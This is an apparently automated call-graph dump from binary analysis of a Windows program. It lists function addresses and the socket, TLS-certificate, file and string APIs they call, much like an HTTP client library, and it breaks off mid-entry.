7ff6029db51d 48088->48090 48193 7ff6029c6280 19 API calls 48089->48193 48090->47969 48093 7ff6029db7e5 48093->48094 48094->48088 48096 7ff6029dba5c 48095->48096 48098 7ff6029db80d 48095->48098 48112 7ff6029db708 48095->48112 48096->48094 48097 7ff6029dba6a 48096->48097 48205 7ff6029b2620 22 API calls 48097->48205 48101 7ff6029db854 48098->48101 48102 7ff6029db816 48098->48102 48100 7ff6029dba7f 48206 7ff6029c6280 19 API calls 48100->48206 48196 7ff6029b2620 22 API calls 48101->48196 48102->48097 48103 7ff6029db823 48102->48103 48194 7ff6029b2620 22 API calls 48103->48194 48107 7ff6029db774 48115 7ff6029db7a0 memcpy 48107->48115 48117 7ff6029db8a8 48107->48117 48108 7ff6029db86b 48197 7ff6029c6280 19 API calls 48108->48197 48109 7ff6029c6b40 48 API calls 48109->48112 48110 7ff6029db838 48195 7ff6029c6280 19 API calls 48110->48195 48112->48107 48112->48109 48114 7ff6029db882 48112->48114 48198 7ff6029c6280 19 API calls 48114->48198 48115->48089 48115->48117 48117->48094 48118 7ff6029dba30 48117->48118 48121 7ff6029dba03 48117->48121 48123 7ff6029db959 48117->48123 48118->48094 48119 7ff6029dba4b 48118->48119 48204 7ff6029f63e0 91 API calls 48119->48204 48202 7ff6029b2620 22 API calls 48121->48202 48125 7ff6029db9cb 48123->48125 48129 7ff6029db967 memset 48123->48129 48124 7ff6029dba17 48203 7ff6029c6280 19 API calls 48124->48203 48127 7ff6029db9e0 48125->48127 48128 7ff6029db9da CertFreeCertificateContext 48125->48128 48127->48118 48131 7ff6029db9e4 48127->48131 48128->48127 48132 7ff6029db98c 48129->48132 48130 7ff6029dba29 48130->48125 48201 7ff6029c6280 19 API calls 48131->48201 48132->48125 48134 7ff6029db99c 48132->48134 48137 7ff6029db9b6 48132->48137 48134->48137 48199 7ff6029bf9f0 255 API calls 48134->48199 48137->48125 48200 7ff6029c6280 19 API calls 48137->48200 48138->47966 48139->47966 48140->47973 48142 7ff6029d821c 48141->48142 48146 7ff6029d8246 48141->48146 48143 7ff6029d8221 _errno 48142->48143 48152 7ff6029d8237 48142->48152 48143->48015 48144 7ff6029d8307 48144->48015 48145 7ff6029d82a0 strchr 48145->48146 48146->48144 48146->48145 48147 7ff6029d83b0 strchr 48148 7ff6029d83d0 strchr 48147->48148 48147->48152 48148->48152 48149 7ff6029fff10 8 API calls 48150 7ff6029d8516 48149->48150 48150->48015 48151 7ff6029d84c5 48154 7ff6029d845d 48151->48154 48168 7ff6029d8260 strchr 48151->48168 48152->48147 48152->48151 48152->48154 48154->48149 48169 7ff6029c67e0 48155->48169 48158->48045 48159->48021 48160->48024 48161->48043 48162->48045 48163->48041 48164->48045 48165->48039 48166->48045 48167 7ff6029c6280 19 API calls 48167->48024 48168->48154 48170 7ff6029c684f 48169->48170 48171 7ff6029c68e7 send 48169->48171 48170->48171 48176 7ff6029d68f0 19 API calls 48170->48176 48172 7ff6029c6905 WSAGetLastError 48171->48172 48173 7ff6029c6914 48171->48173 48172->48173 48174 7ff6029c6920 48172->48174 48177 7ff6029fff10 8 API calls 48173->48177 48187 7ff6029b2e10 27 API calls 48174->48187 48179 7ff6029c6883 48176->48179 48180 7ff6029c6967 48177->48180 48178 7ff6029c6932 48188 7ff6029c6280 19 API calls 48178->48188 48179->48171 48183 7ff6029c688c 48179->48183 48180->48024 48180->48167 48182 7ff6029c6944 48182->48173 48184 7ff6029c68c0 recv 48183->48184 48185 7ff6029c6894 malloc 48183->48185 48184->48171 48186 7ff6029c68dd 48184->48186 48185->48184 48185->48186 48186->48171 48187->48178 48188->48182 48190 7ff6029c6642 48189->48190 48191 7ff6029c661b WSAGetLastError 48189->48191 48190->48085 48191->48085 48192->48094 48193->48093 48194->48110 48195->48093 48196->48108 48197->48093 48198->48093 48199->48137 48200->48125 48201->48093 48202->48124 48203->48130 48204->48093 48205->48100 48206->48093 48207->47985 48208->47985 48209->47980 48210 7ff6029e29c0 48211 7ff6029e2a50 48210->48211 48212 7ff6029e29e9 48210->48212 48286 7ff6029cbfe0 48211->48286 48214 7ff6029e2a10 48212->48214 48215 7ff6029e29fa 48212->48215 48245 7ff6029c7290 48214->48245 48284 7ff6029cbee0 405 API calls 48215->48284 48218 7ff6029e2a5d 48225 7ff6029e2ac1 48218->48225 48240 7ff6029e2b3a 48218->48240 48306 7ff6029fb390 35 API calls 48218->48306 48219 7ff6029e2a05 48221 7ff6029e2a21 48221->48240 48285 7ff6029e3640 65 API calls 48221->48285 48223 7ff6029e2af2 48226 7ff6029e2b4e 48223->48226 48227 7ff6029e2afe 48223->48227 48224 7ff6029e2bee 48314 7ff6029cd2b0 17 API calls 48224->48314 48225->48223 48225->48224 48225->48240 48230 7ff6029e2b57 48226->48230 48310 7ff6029fd420 _errno strtoll _errno 48226->48310 48307 7ff6029e3350 271 API calls 48227->48307 48236 7ff6029e2bae 48230->48236 48312 7ff6029e36e0 72 API calls 48230->48312 48232 7ff6029e2a45 48234 7ff6029e2b08 48234->48240 48308 7ff6029e2ea0 26 API calls 48234->48308 48236->48240 48313 7ff6029fb390 35 API calls 48236->48313 48239 7ff6029e2b23 48239->48240 48309 7ff6029e3290 32 API calls 48239->48309 48241 7ff6029e2b73 48241->48230 48241->48236 48242 7ff6029e2b99 48241->48242 48311 7ff6029e36e0 72 API calls 48242->48311 48246 7ff6029c72e8 48245->48246 48260 7ff6029c72df 48245->48260 48247 7ff6029ce0c0 2 API calls 48246->48247 48250 7ff6029c7302 48247->48250 48248 7ff6029fff10 8 API calls 48249 7ff6029c7815 48248->48249 48249->48211 48249->48221 48251 7ff6029c7392 48250->48251 48252 7ff6029c7379 48250->48252 48253 7ff6029c739c 48251->48253 48264 7ff6029c73c9 48251->48264 48336 7ff6029c6280 19 API calls 48252->48336 48256 7ff6029c8460 611 API calls 48253->48256 48255 7ff6029c7388 48255->48260 48257 7ff6029c73aa 48256->48257 48257->48260 48261 7ff6029c8570 51 API calls 48257->48261 48258 7ff6029d68f0 19 API calls 48258->48264 48259 7ff6029c76a5 48259->48260 48338 7ff6029c8b90 616 API calls 48259->48338 48260->48248 48261->48260 48263 7ff6029c7614 SleepEx getsockopt 48263->48264 48265 7ff6029c765c WSAGetLastError 48263->48265 48264->48258 48264->48259 48264->48263 48266 7ff6029c75b6 SleepEx getsockopt 48264->48266 48269 7ff6029c76e3 48264->48269 48270 7ff6029c74c7 WSASetLastError 48264->48270 48275 7ff6029c6400 15 API calls 48264->48275 48282 7ff6029c8b90 616 API calls 48264->48282 48337 7ff6029b2e10 27 API calls 48264->48337 48265->48264 48266->48264 48267 7ff6029c75fe WSAGetLastError 48266->48267 48267->48264 48268 7ff6029c76d7 48339 7ff6029b2e10 27 API calls 48268->48339 48273 7ff6029c6ee0 2 API calls 48269->48273 48277 7ff6029c773b 48269->48277 48270->48264 48271 7ff6029c76be 48271->48260 48271->48268 48273->48277 48275->48264 48276 7ff6029c77b7 48340 7ff6029c6280 19 API calls 48276->48340 48315 7ff6029c8460 48277->48315 48278 7ff6029c7759 48278->48260 48328 7ff6029c8570 48278->48328 48281 7ff6029c77d5 48281->48260 48282->48264 48284->48219 48285->48232 48287 7ff6029cc014 48286->48287 48288 7ff6029cc02f 48286->48288 48287->48288 48289 7ff6029c0480 255 API calls 48287->48289 48290 7ff6029cc071 memset 48288->48290 48292 7ff6029cc035 48288->48292 48289->48288 48294 7ff6029cc0a3 48290->48294 48291 7ff6029fff10 8 API calls 48293 7ff6029cc1d5 48291->48293 48292->48291 48293->48218 48295 7ff6029cc0fe calloc 48294->48295 48296 7ff6029cc176 48294->48296 48297 7ff6029cc12c 48295->48297 48298 7ff6029cc116 48295->48298 48345 7ff6029cb390 404 API calls 48296->48345 48301 7ff6029c6400 15 API calls 48297->48301 48298->48292 48300 7ff6029cc186 48303 7ff6029c6400 15 API calls 48300->48303 48304 7ff6029cc1a1 48300->48304 48302 7ff6029cc13b 48301->48302 48302->48296 48303->48304 48304->48292 48305 7ff6029cc1ab free 48304->48305 48305->48292 48306->48225 48307->48234 48308->48239 48309->48240 48310->48241 48311->48236 48312->48236 48313->48240 48314->48240 48316 7ff6029c8565 48315->48316 48317 7ff6029c8477 48315->48317 48316->48278 48318 7ff6029c8547 48317->48318 48319 7ff6029c851a 48317->48319 48322 7ff6029c84fc 48317->48322 48343 7ff6029d6d50 583 API calls 48318->48343 48342 7ff6029d73a0 610 API calls 48319->48342 48321 7ff6029c8560 48321->48278 48322->48319 48324 7ff6029c8501 48322->48324 48341 7ff6029c6280 19 API calls 48324->48341 48325 7ff6029c8542 48325->48278 48327 7ff6029c8510 48327->48278 48329 7ff6029c8590 48328->48329 48330 7ff6029c859d 48328->48330 48331 7ff6029d59a0 2 API calls 48329->48331 48332 7ff6029c7c10 47 API calls 48330->48332 48331->48330 48333 7ff6029c85ad 48332->48333 48344 7ff6029c29b0 15 API calls 48333->48344 48335 7ff6029c85b5 48335->48260 48336->48255 48337->48264 48338->48271 48339->48276 48340->48281 48341->48327 48342->48325 48343->48321 48344->48335 48345->48300 48346 7ff6029b823b 48347 7ff6029b8251 48346->48347 48348 7ff6029b8282 48346->48348 48383 7ff6029cfea0 48347->48383 48349 7ff6029b832a 48348->48349 48350 7ff6029b8280 48348->48350 48352 7ff6029b8344 48349->48352 48353 7ff6029b83e4 48349->48353 48357 7ff6029b7610 292 API calls 48350->48357 48378 7ff6029b7b8b 48350->48378 48630 7ff6029cd120 24 API calls 48352->48630 48358 7ff6029b7610 292 API calls 48353->48358 48353->48378 48354 7ff6029b826a 48356 7ff6029d59a0 2 API calls 48354->48356 48356->48350 48357->48378 48358->48378 48359 7ff6029b8db0 17 API calls 48359->48378 48360 7ff6029b8351 48362 7ff6029b7610 292 API calls 48360->48362 48364 7ff6029b8371 48362->48364 48363 7ff6029b8c32 48366 7ff6029b83d6 free 48364->48366 48367 7ff6029b837a 48364->48367 48365 7ff6029b8c23 48634 7ff6029c6280 19 API calls 48365->48634 48366->48378 48369 7ff6029b8391 48367->48369 48371 7ff6029b8383 free 48367->48371 48631 7ff6029cc6e0 28 API calls 48369->48631 48371->48378 48372 7ff6029c1d40 90 API calls 48372->48378 48374 7ff6029b83c7 free 48374->48378 48375 7ff6029c7b00 10 API calls 48375->48378 48376 7ff6029b83a2 48376->48374 48377 7ff6029b7c2e 48377->48378 48379 7ff6029c6280 19 API calls 48377->48379 48378->48359 48378->48363 48378->48365 48378->48372 48378->48375 48378->48377 48381 7ff6029b7610 292 API calls 48378->48381 48629 7ff6029c6280 19 API calls 48378->48629 48632 7ff6029b6330 15 API calls 48378->48632 48633 7ff6029d5af0 22 API calls 48378->48633 48379->48377 48381->48378 48384 7ff6029cff38 48383->48384 48385 7ff6029cff71 free _strdup 48384->48385 48388 7ff6029cff9b 48384->48388 48584 7ff6029cff4e 48384->48584 48385->48388 48385->48584 48386 7ff6029fff10 8 API calls 48387 7ff6029b825b 48386->48387 48387->48348 48387->48354 48389 7ff6029d0065 48388->48389 48390 7ff6029d0051 free 48388->48390 48391 7ff6029d0084 48389->48391 48675 7ff6029c96c0 15 API calls 48389->48675 48390->48389 48393 7ff6029d00cf free 48391->48393 48394 7ff6029d012d 48391->48394 48391->48584 48396 7ff6029d00e2 free 48393->48396 48403 7ff6029d0191 48394->48403 48676 7ff6029d4d90 337 API calls 48394->48676 48404 7ff6029d0233 48396->48404 48406 7ff6029d025a 48396->48406 48398 7ff6029d0179 48401 7ff6029d0180 free 48398->48401 48398->48403 48400 7ff6029d01ce free 48400->48396 48400->48584 48401->48584 48403->48400 48677 7ff6029d4d90 337 API calls 48403->48677 48404->48406 48678 7ff6029c96c0 15 API calls 48404->48678 48407 7ff6029d0316 free 48406->48407 48408 7ff6029d02de free 48406->48408 48406->48584 48409 7ff6029d0305 48407->48409 48679 7ff6029c96c0 15 API calls 48408->48679 48411 7ff6029d034d 48409->48411 48416 7ff6029d0336 48409->48416 48409->48584 48680 7ff6029bc510 6 API calls 48411->48680 48413 7ff6029d0359 48681 7ff6029f4830 59 API calls 48413->48681 48415 7ff6029d0372 48415->48416 48415->48584 48416->48416 48445 7ff6029d033b 48416->48445 48682 7ff6029bd480 free free 48416->48682 48417 7ff6029d05bc free 48427 7ff6029d05df 48417->48427 48419 7ff6029d0448 48421 7ff6029d048f strchr 48419->48421 48437 7ff6029d0461 48419->48437 48420 7ff6029d03e0 48683 7ff6029bc710 26 API calls 48420->48683 48423 7ff6029d04a4 strchr 48421->48423 48421->48437 48422 7ff6029d06e7 48433 7ff6029d0710 48422->48433 48435 7ff6029d074b 48422->48435 48428 7ff6029d04b7 strchr 48423->48428 48423->48437 48424 7ff6029d059c 48685 7ff6029c6280 19 API calls 48424->48685 48426 7ff6029d0615 48686 7ff6029d29a0 strchr strchr strchr malloc memcpy 48426->48686 48427->48422 48427->48426 48428->48437 48429 7ff6029d0515 48429->48424 48429->48437 48431 7ff6029d03f5 48684 7ff6029bd480 free free 48431->48684 48688 7ff6029c96c0 15 API calls 48433->48688 48689 7ff6029c96c0 15 API calls 48435->48689 48437->48417 48438 7ff6029d061d 48440 7ff6029d0630 free 48438->48440 48441 7ff6029d063b 48438->48441 48438->48584 48443 7ff6029d068f 48440->48443 48444 7ff6029d0666 48441->48444 48450 7ff6029d0650 memcpy 48441->48450 48442 7ff6029d0749 48449 7ff6029d06b3 48442->48449 48475 7ff6029d096f 48442->48475 48442->48584 48443->48449 48687 7ff6029c96c0 15 API calls 48443->48687 48446 7ff6029d066b strchr 48444->48446 48445->48419 48445->48429 48445->48584 48447 7ff6029d067b free 48446->48447 48448 7ff6029d0678 48446->48448 48447->48443 48448->48447 48449->48442 48453 7ff6029d05ab 48449->48453 48690 7ff6029eee50 23 API calls 48449->48690 48450->48446 48453->48584 48454 7ff6029d0962 48458 7ff6029eee20 13 API calls 48454->48458 48455 7ff6029d09ae 48462 7ff6029d09ea free 48455->48462 48466 7ff6029d0b3e 48455->48466 48467 7ff6029d0a0a 48455->48467 48456 7ff6029d0c00 calloc 48459 7ff6029d0c2f 48456->48459 48456->48584 48457 7ff6029d0a68 48698 7ff6029c6280 19 API calls 48457->48698 48458->48453 48635 7ff6029d2270 48459->48635 48461 7ff6029d07c7 48461->48454 48461->48584 48691 7ff6029eef90 8 API calls 48461->48691 48697 7ff6029c96c0 15 API calls 48462->48697 48464 7ff6029d0c43 48471 7ff6029d0cb0 48464->48471 48476 7ff6029d0c77 48464->48476 48464->48584 48466->48467 48470 7ff6029d0b62 free 48466->48470 48467->48456 48467->48584 48468 7ff6029d0a81 48479 7ff6029d0b22 48468->48479 48483 7ff6029d0adf 48468->48483 48473 7ff6029d0b80 48470->48473 48474 7ff6029d0b8d 48470->48474 48477 7ff6029d0cb5 48471->48477 48478 7ff6029d0cde 48471->48478 48472 7ff6029d0872 48472->48454 48480 7ff6029d087a 48472->48480 48702 7ff6029c96c0 15 API calls 48473->48702 48474->48473 48481 7ff6029d0ba0 48474->48481 48475->48455 48475->48457 48475->48468 48475->48483 48703 7ff6029d1eb0 7 API calls 48476->48703 48486 7ff6029d2270 25 API calls 48477->48486 48704 7ff6029d1eb0 7 API calls 48478->48704 48700 7ff6029c6280 19 API calls 48479->48700 48692 7ff6029eee20 48480->48692 48701 7ff6029c96c0 15 API calls 48481->48701 48483->48455 48490 7ff6029d0b09 48483->48490 48502 7ff6029d0cdc 48486->48502 48699 7ff6029c6280 19 API calls 48490->48699 48493 7ff6029d0cfb 48499 7ff6029d2270 25 API calls 48493->48499 48493->48502 48493->48584 48495 7ff6029d0c98 free 48495->48502 48496 7ff6029d0882 48496->48475 48497 7ff6029d093f 48496->48497 48498 7ff6029d08aa strstr 48496->48498 48497->48475 48501 7ff6029d08c2 48498->48501 48499->48502 48500 7ff6029c9790 13 API calls 48500->48497 48501->48497 48501->48500 48503 7ff6029d2270 25 API calls 48502->48503 48502->48584 48504 7ff6029d0ef0 free free free 48503->48504 48506 7ff6029d0f2e 48504->48506 48504->48584 48505 7ff6029d10eb 48508 7ff6029d1231 48505->48508 48505->48584 48708 7ff6029d8580 _gmtime64 48505->48708 48506->48505 48507 7ff6029d0f91 48506->48507 48515 7ff6029d1075 48506->48515 48506->48584 48705 7ff6029ba330 62 API calls 48507->48705 48645 7ff6029d2310 48508->48645 48509 7ff6029d10c0 48509->48505 48512 7ff6029d10d4 48509->48512 48509->48584 48707 7ff6029d1eb0 7 API calls 48512->48707 48513 7ff6029d111d 48518 7ff6029d1123 48513->48518 48535 7ff6029d1139 48513->48535 48514 7ff6029d1094 48520 7ff6029d2270 25 API calls 48514->48520 48514->48584 48515->48509 48515->48514 48519 7ff6029d2270 25 API calls 48515->48519 48709 7ff6029c6280 19 API calls 48518->48709 48519->48514 48520->48509 48521 7ff6029d10e8 48521->48505 48523 7ff6029d123f 48524 7ff6029d1270 48523->48524 48530 7ff6029d165c 48523->48530 48523->48584 48526 7ff6029d1603 48524->48526 48528 7ff6029d1280 48524->48528 48529 7ff6029d1367 48524->48529 48525 7ff6029d1066 48525->48515 48719 7ff6029d1eb0 7 API calls 48526->48719 48528->48526 48549 7ff6029d128a 48528->48549 48531 7ff6029d1370 48529->48531 48550 7ff6029d13e1 48529->48550 48542 7ff6029d2270 25 API calls 48530->48542 48545 7ff6029d16b5 48530->48545 48534 7ff6029d2270 25 API calls 48531->48534 48532 7ff6029d1619 48539 7ff6029d2020 62 API calls 48532->48539 48532->48584 48533 7ff6029d105e 48706 7ff6029ba2a0 9 API calls 48533->48706 48537 7ff6029d1380 48534->48537 48535->48508 48543 7ff6029c9790 13 API calls 48535->48543 48535->48584 48536 7ff6029d0fd8 48536->48525 48536->48533 48538 7ff6029d2270 25 API calls 48536->48538 48553 7ff6029d2020 62 API calls 48537->48553 48537->48584 48538->48536 48548 7ff6029d163c 48539->48548 48540 7ff6029d12db 48551 7ff6029d12ff 48540->48551 48540->48584 48711 7ff6029d48a0 28 API calls 48540->48711 48542->48545 48552 7ff6029d1205 48543->48552 48544 7ff6029d1474 48560 7ff6029d1551 48544->48560 48575 7ff6029d148f 48544->48575 48546 7ff6029d16e1 48545->48546 48547 7ff6029d2270 25 API calls 48545->48547 48545->48584 48561 7ff6029d17d1 48546->48561 48546->48584 48593 7ff6029d1704 48546->48593 48547->48546 48554 7ff6029d13bf 48548->48554 48555 7ff6029d1646 48548->48555 48549->48540 48565 7ff6029d2270 25 API calls 48549->48565 48557 7ff6029d2270 25 API calls 48550->48557 48568 7ff6029d1430 48550->48568 48712 7ff6029d1eb0 7 API calls 48551->48712 48710 7ff6029d1eb0 7 API calls 48552->48710 48562 7ff6029d13a3 48553->48562 48715 7ff6029cd2b0 17 API calls 48554->48715 48720 7ff6029c6280 19 API calls 48555->48720 48557->48568 48559 7ff6029d2270 25 API calls 48559->48568 48595 7ff6029d1535 48560->48595 48716 7ff6029d48a0 28 API calls 48560->48716 48607 7ff6029d177c 48561->48607 48721 7ff6029d48a0 28 API calls 48561->48721 48562->48554 48569 7ff6029d13a9 48562->48569 48565->48540 48566 7ff6029d12f7 48566->48551 48566->48584 48568->48544 48568->48559 48568->48584 48714 7ff6029c6280 19 API calls 48569->48714 48571 7ff6029d1227 48571->48508 48571->48584 48580 7ff6029d14cf strchr 48575->48580 48575->48595 48577 7ff6029d1315 48577->48584 48585 7ff6029d2020 62 API calls 48577->48585 48578 7ff6029d1991 48729 7ff6029d1eb0 7 API calls 48578->48729 48579 7ff6029d1807 48587 7ff6029d1821 48579->48587 48601 7ff6029d18f8 48579->48601 48588 7ff6029d14e4 strchr 48580->48588 48606 7ff6029d1504 48580->48606 48581 7ff6029d1747 strchr 48589 7ff6029d175c strchr 48581->48589 48581->48607 48583 7ff6029d13d8 48583->48584 48731 7ff6029d5af0 22 API calls 48583->48731 48584->48386 48586 7ff6029d1343 48585->48586 48590 7ff6029d135f 48586->48590 48591 7ff6029d1349 48586->48591 48592 7ff6029d182e 48587->48592 48587->48601 48594 7ff6029d14f7 strchr 48588->48594 48588->48606 48596 7ff6029d176f strchr 48589->48596 48589->48607 48730 7ff6029cd2b0 17 API calls 48590->48730 48713 7ff6029c6280 19 API calls 48591->48713 48722 7ff6029d1eb0 7 API calls 48592->48722 48593->48581 48593->48607 48594->48606 48717 7ff6029d1eb0 7 API calls 48595->48717 48596->48607 48597 7ff6029d1590 48597->48584 48603 7ff6029d2020 62 API calls 48597->48603 48601->48584 48616 7ff6029d1868 48601->48616 48727 7ff6029d1eb0 7 API calls 48601->48727 48610 7ff6029d15e3 48603->48610 48604 7ff6029d1844 48604->48584 48614 7ff6029d1855 48604->48614 48615 7ff6029d186d 48604->48615 48605 7ff6029d1953 48655 7ff6029d2020 48605->48655 48606->48584 48606->48595 48607->48578 48607->48579 48607->48584 48609 7ff6029d1a65 48609->48584 48611 7ff6029c6400 15 API calls 48609->48611 48610->48590 48613 7ff6029d15ed 48610->48613 48611->48584 48718 7ff6029c6280 19 API calls 48613->48718 48723 7ff6029d1eb0 7 API calls 48614->48723 48620 7ff6029d18b4 48615->48620 48622 7ff6029d2270 25 API calls 48615->48622 48616->48584 48616->48605 48620->48616 48726 7ff6029d1eb0 7 API calls 48620->48726 48621 7ff6029d197b 48728 7ff6029c6280 19 API calls 48621->48728 48625 7ff6029d1885 48622->48625 48625->48616 48724 7ff6029d1eb0 7 API calls 48625->48724 48627 7ff6029d189c 48627->48620 48725 7ff6029d1eb0 7 API calls 48627->48725 48629->48378 48630->48360 48631->48376 48632->48378 48633->48378 48634->48363 48732 7ff6029c9800 15 API calls 48635->48732 48637 7ff6029d2299 48638 7ff6029d22a1 48637->48638 48639 7ff6029d22da 48637->48639 48733 7ff6029d1eb0 7 API calls 48638->48733 48641 7ff6029d22e7 free free 48639->48641 48642 7ff6029d22f9 48639->48642 48641->48642 48642->48464 48644 7ff6029d22c5 free 48644->48464 48653 7ff6029d233b 48645->48653 48646 7ff6029d261a 48646->48523 48647 7ff6029d23c0 strchr 48648 7ff6029d23d9 strchr 48647->48648 48647->48653 48648->48653 48649 7ff6029d2428 _strdup 48650 7ff6029d2639 48649->48650 48649->48653 48650->48646 48651 7ff6029d2643 free free 48650->48651 48651->48646 48652 7ff6029d25f4 free 48652->48653 48653->48646 48653->48647 48653->48649 48653->48652 48654 7ff6029d2270 25 API calls 48653->48654 48654->48653 48656 7ff6029d2082 48655->48656 48657 7ff6029d20ea 48656->48657 48658 7ff6029d2094 48656->48658 48734 7ff6029c6ad0 48657->48734 48737 7ff6029cc990 malloc 48658->48737 48660 7ff6029d20a9 48662 7ff6029d20cf memcpy 48660->48662 48663 7ff6029d20b0 48660->48663 48662->48657 48665 7ff6029d20b5 free free 48663->48665 48666 7ff6029d20c7 48663->48666 48665->48666 48667 7ff6029d1971 48666->48667 48667->48590 48667->48621 48668 7ff6029d2239 free free 48668->48667 48669 7ff6029d214c 48738 7ff6029c61c0 fwrite fwrite 48669->48738 48670 7ff6029d217e 48670->48667 48670->48668 48672 7ff6029d215d 48675->48391 48676->48398 48677->48400 48678->48406 48679->48409 48680->48413 48681->48415 48682->48420 48683->48431 48684->48445 48685->48453 48686->48438 48687->48449 48688->48442 48689->48442 48690->48461 48691->48472 48693 7ff6029eee25 48692->48693 48694 7ff6029eee40 48692->48694 48762 7ff6029efe00 12 API calls 48693->48762 48694->48496 48697->48467 48698->48453 48699->48453 48700->48453 48701->48467 48702->48467 48703->48495 48704->48493 48705->48536 48706->48525 48707->48521 48708->48513 48709->48453 48710->48571 48711->48566 48712->48577 48713->48584 48714->48453 48715->48583 48716->48606 48717->48597 48718->48453 48719->48532 48720->48453 48721->48607 48722->48604 48723->48616 48724->48627 48725->48620 48726->48616 48727->48616 48728->48453 48729->48601 48730->48583 48731->48609 48732->48637 48733->48644 48740 7ff6029dc5a0 48734->48740 48737->48660 48738->48672 48741 7ff6029dc5f2 48740->48741 48742 7ff6029dc619 malloc 48740->48742 48741->48742 48745 7ff6029dc60c 48741->48745 48743 7ff6029dc659 48742->48743 48742->48745 48744 7ff6029dc679 memcpy 48743->48744 48755 7ff6029dc6fc 48744->48755 48746 7ff6029fff10 8 API calls 48745->48746 48747 7ff6029c6b00 48746->48747 48747->48669 48747->48670 48748 7ff6029dc79d 48749 7ff6029dc809 free 48748->48749 48749->48745 48750 7ff6029c7b00 10 API calls 48750->48755 48751 7ff6029dc7d1 48761 7ff6029c6280 19 API calls 48751->48761 48753 7ff6029d68f0 19 API calls 48753->48755 48755->48748 48755->48749 48755->48750 48755->48751 48755->48753 48756 7ff6029dc7ab WSAGetLastError 48755->48756 48759 7ff6029c6b40 48 API calls 48755->48759 48760 7ff6029c6280 19 API calls 48756->48760 48758 7ff6029dc7c3 48758->48748 48759->48755 48760->48758 48763 7ff6029bbab0 48764 7ff6029c9790 13 API calls 48763->48764 48765 7ff6029bbaef 48764->48765 48782 7ff6029d8fe0 getaddrinfo 48765->48782 48768 7ff6029bbb2d EnterCriticalSection 48772 7ff6029bbb58 48768->48772 48773 7ff6029bbb3c LeaveCriticalSection 48768->48773 48769 7ff6029bbb0b WSAGetLastError 48770 7ff6029bbb15 WSAGetLastError 48769->48770 48771 7ff6029bbb2a 48769->48771 48770->48768 48771->48768 48774 7ff6029bbb62 send 48772->48774 48775 7ff6029bbb86 LeaveCriticalSection 48772->48775 48800 7ff6029bba40 7 API calls 48773->48800 48774->48775 48777 7ff6029bbb7d WSAGetLastError 48774->48777 48778 7ff6029bbb96 48775->48778 48777->48775 48780 7ff6029fff10 8 API calls 48778->48780 48779 7ff6029bbb4d free 48779->48778 48781 7ff6029bbba5 48780->48781 48784 7ff6029d9013 48782->48784 48794 7ff6029bbb05 48782->48794 48783 7ff6029d9184 WSASetLastError 48783->48794 48784->48783 48785 7ff6029d90fe 48784->48785 48788 7ff6029d9069 malloc 48784->48788 48786 7ff6029d9141 freeaddrinfo 48785->48786 48787 7ff6029d9147 48785->48787 48786->48787 48789 7ff6029d917f 48787->48789 48790 7ff6029d914c 48787->48790 48791 7ff6029d9080 malloc 48788->48791 48792 7ff6029d912c 48788->48792 48789->48783 48789->48794 48793 7ff6029d9151 free free free 48790->48793 48790->48794 48795 7ff6029d911b free 48791->48795 48796 7ff6029d90b7 memcpy 48791->48796 48792->48785 48793->48793 48793->48794 48794->48768 48794->48769 48795->48785 48797 7ff6029d90cf _strdup 48796->48797 48798 7ff6029d90de 48796->48798 48797->48798 48799 7ff6029d9100 free free 48797->48799 48798->48784 48799->48785 48800->48779 48801 7ff6029da915 48802 7ff6029da919 48801->48802 48820 7ff6029da9e7 48802->48820 48830 7ff6029da9a0 strtol 48802->48830 48835 7ff6029da9c2 strchr 48802->48835 48854 7ff6029daa47 48802->48854 48907 7ff6029d9d40 62 API calls 48802->48907 48803 7ff6029daea5 calloc 48805 7ff6029daecc 48803->48805 48806 7ff6029daf48 48803->48806 48804 7ff6029daa06 strchr 48807 7ff6029daa1f strncmp 48804->48807 48826 7ff6029dab6b 48804->48826 48913 7ff6029c6280 19 API calls 48805->48913 48815 7ff6029dafa4 CertFreeCertificateContext 48806->48815 48816 7ff6029dafaa 48806->48816 48809 7ff6029daa60 strncmp 48807->48809 48819 7ff6029daa3c 48807->48819 48813 7ff6029daa82 strncmp 48809->48813 48809->48819 48810 7ff6029dac7e fopen 48811 7ff6029daf2b 48810->48811 48821 7ff6029dac97 fseek 48810->48821 48915 7ff6029c6280 19 API calls 48811->48915 48812 7ff6029daedb 48822 7ff6029db166 48812->48822 48823 7ff6029daee9 CertFreeCertificateContext 48812->48823 48818 7ff6029daaa4 strncmp 48813->48818 48813->48819 48814 7ff6029dab39 strchr 48817 7ff6029dab53 _strdup 48814->48817 48814->48826 48815->48816 48827 7ff6029db013 48816->48827 48828 7ff6029dafae 48816->48828 48825 7ff6029dab73 48817->48825 48817->48826 48818->48819 48829 7ff6029daac3 strncmp 48818->48829 48819->48814 48820->48803 48820->48804 48831 7ff6029dacc1 ftell 48821->48831 48832 7ff6029daccd 48821->48832 48837 7ff6029fff10 8 API calls 48822->48837 48823->48822 48825->48826 48852 7ff6029dab94 CertOpenStore 48825->48852 48826->48810 48826->48811 48846 7ff6029d8210 13 API calls 48827->48846 48916 7ff6029b2620 22 API calls 48828->48916 48829->48814 48836 7ff6029daada strncmp 48829->48836 48830->48802 48830->48835 48831->48832 48838 7ff6029dacde fseek 48832->48838 48839 7ff6029daef9 fclose 48832->48839 48833 7ff6029daa56 48833->48822 48835->48802 48835->48820 48836->48819 48842 7ff6029daaf9 strncmp 48836->48842 48843 7ff6029db31c 48837->48843 48838->48839 48844 7ff6029dacfb malloc 48838->48844 48914 7ff6029c6280 19 API calls 48839->48914 48840 7ff6029dafc2 48917 7ff6029c6280 19 API calls 48840->48917 48842->48819 48848 7ff6029dab18 strncmp 48842->48848 48844->48839 48849 7ff6029dad14 fread 48844->48849 48851 7ff6029db02c 48846->48851 48848->48819 48848->48826 48849->48839 48855 7ff6029dad32 fclose 48849->48855 48850 7ff6029daf18 free 48850->48822 48856 7ff6029db03f 48851->48856 48866 7ff6029d8210 13 API calls 48851->48866 48857 7ff6029dabe7 free CryptStringToBinaryA 48852->48857 48858 7ff6029dabb7 GetLastError 48852->48858 48853 7ff6029dafd4 free 48853->48822 48853->48833 48908 7ff6029c6280 19 API calls 48854->48908 48863 7ff6029dad5f malloc 48855->48863 48864 7ff6029dad4f 48855->48864 48859 7ff6029c6400 15 API calls 48856->48859 48867 7ff6029db052 48856->48867 48861 7ff6029dac32 CertFindCertificateInStore 48857->48861 48862 7ff6029dae71 CertCloseStore 48857->48862 48909 7ff6029c6280 19 API calls 48858->48909 48859->48867 48869 7ff6029dac64 48861->48869 48870 7ff6029dae8a CertCloseStore 48861->48870 48862->48822 48871 7ff6029dada3 PFXImportCertStore free free 48863->48871 48872 